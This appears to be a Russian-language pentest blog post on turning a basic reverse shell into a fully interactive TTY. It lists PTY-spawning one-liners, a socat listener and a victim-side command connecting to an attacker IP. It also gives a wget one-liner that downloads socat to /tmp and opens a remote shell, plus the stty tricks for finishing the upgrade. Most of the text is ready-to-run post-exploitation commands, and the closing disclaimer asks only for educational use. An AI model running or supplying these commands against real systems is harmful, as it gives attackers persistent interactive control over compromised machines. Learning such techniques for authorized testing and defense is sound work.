Апгрейд Reverse shell до интерактивного TTY

Всем хай,

В продолжении статьи про бэк-коннект или reverse хотели бы Вам поведать, как же все таки облегчить себе процесс управления и отображения на экран. Ведь при использовании обычного слушателя nc -l port мы видим лишь прямой вывод, у нас нет возможности быстро и привычно работать с сессией и выглядит это мягко говоря F$#@!!!

Ну серьезно это очень раздражает, это сравни работы в стандартном текстовике винды после notepad++ и выглядит это так:

terminal_no_tty

Итак, для насыщения убогого шела “красками” есть целый ряд команд:

python -c 'import pty; pty.spawn("/bin/sh")'

И мы получаем привычную нам оболочку со всеми удобствами:

python_tty

echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
exec "/bin/sh"
:!bash
:set shell=/bin/bash:shell

Через NMAP:

!sh

Так же существует другое множество инструментария для реализации интерактивной оболочки, к примеру socat (https://github.com/andrew-d/static-binaries)

Слушатель:

socat file:'tty',raw,echo=0 tcp-listen:4444

Цель/Жертва:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

socat_tty

ну или одной строкой на компе жертвы если есть wget

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

или создание интерактивного шела средствами метасплоита или msfvenom

msfvenom_payloads

netcat_shell_cmd

В котором уже есть перловый однострочник (oneliner)

perl_shell_cmd

Так же используется метод доработки текущего вывода в любимом всем netcat, но как Вы понимаете его использование слегка заморочено

!!! In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
!!! In Kali
$ stty raw -echo
$ fg
!!! In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

Ну и напоследок, это лишь пример, как в реальной жизни сделать обыденные вещи чуточку удобнее и не используйте данную информацию во вред, только с целью обогащения собственных знаний и навыков.

Источником, вдохновившим на написание этой удобняшнки является ropnop и мы его слегка дополнили

Tagged with: